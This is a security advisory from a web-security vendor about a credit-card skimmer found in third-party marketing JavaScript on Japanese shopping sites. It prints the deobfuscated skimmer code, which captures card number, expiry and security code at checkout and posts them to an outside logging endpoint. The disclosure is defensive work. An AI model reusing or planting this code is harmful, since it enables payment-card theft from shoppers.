Gradient glow shape

Security Warning: Data Theft Identified

By Vault JS | July 27, 2022

Bright red alert box

UPDATE: Vault JS believes that the malicious code has been removed. It appears the vulnerability existed at least on July 25 and July 26th (in Pacific time zone).

Since July 25, 2022 Vault JS experts have identified suspicious code on nearly 60 different websites that are running web marketing tools from Showcase-TV. These sites are currently not being supported by Vault JS and may be leaking customer data right now. If you are using Showcase-TV, you should consider removing this code temporarily until this is resolved.

The issue comes from JavaScript hosted @navicast.jp. The request to r2.sb/api returns JavaScript code that behaves suspiciously, performing the following actions:

  1. The code attaches to an order confirmation button click event
  2. When the button is clicked, the code scrapes credit card information from the page
  3. The code then posts that information to an endpoint at r2.sb/log_api/log

The code is obfuscated to make it more difficult to uncover this activity. Below, we’ve deobfuscated the portion of the code which concerns our team. As you see, the code gathers the credit card number, expiration date month and year, and security code. It then logs this data. This example is from the payments page of the e-commerce website www.chojyu.com. In addition, our team believes the sites www.ekenkoshop.jp, fig-viper.jp, and scores of other sites have also been compromised.

$(document)['ready'](function() { var _0x4274b8 = _0x46bb68; $('input[type=\x27submit\x27][value=\x27ご注文内容の確認\x27]')['click'](function() { var _0x4361d6 = _0x4274b8, _0x1dae2e = $("input[name='creditCardNo']")['val'](), _0x10a67d = $("select[name='enableMonth']")['val'](), _0x5606c5 = $('select[name=\x27enableYear\x27]')['val'](), _0x17e0f3 = $("input[name='securityCode']")['val'](), _0x1dae2e = btoa(encodeURIComponent(_0x1dae2e)), _0x10a67d = btoa(encodeURIComponent(_0x10a67d)), _0x5606c5 = btoa(encodeURIComponent(_0x5606c5)), _0x17e0f3 = btoa(encodeURIComponent(_0x17e0f3)); $['post']('https://r2.sb/log_api/log', { 'id': _0x1dae2e, // cc num 'id_m': _0x10a67d, // month 'id_y': _0x5606c5, // year 'id_c': _0x17e0f3, // security code 'id_f': 'chojyu.com' }, function(_0x51ab99) {}); }); }));

Please follow our LinkedIn page for ongoing updates. In addition, you can request a free analysis of your own site to uncover any suspicious code or data leaks that might be happening right now through your third party tags.

See if your organization's privacy compliance is putting you at risk.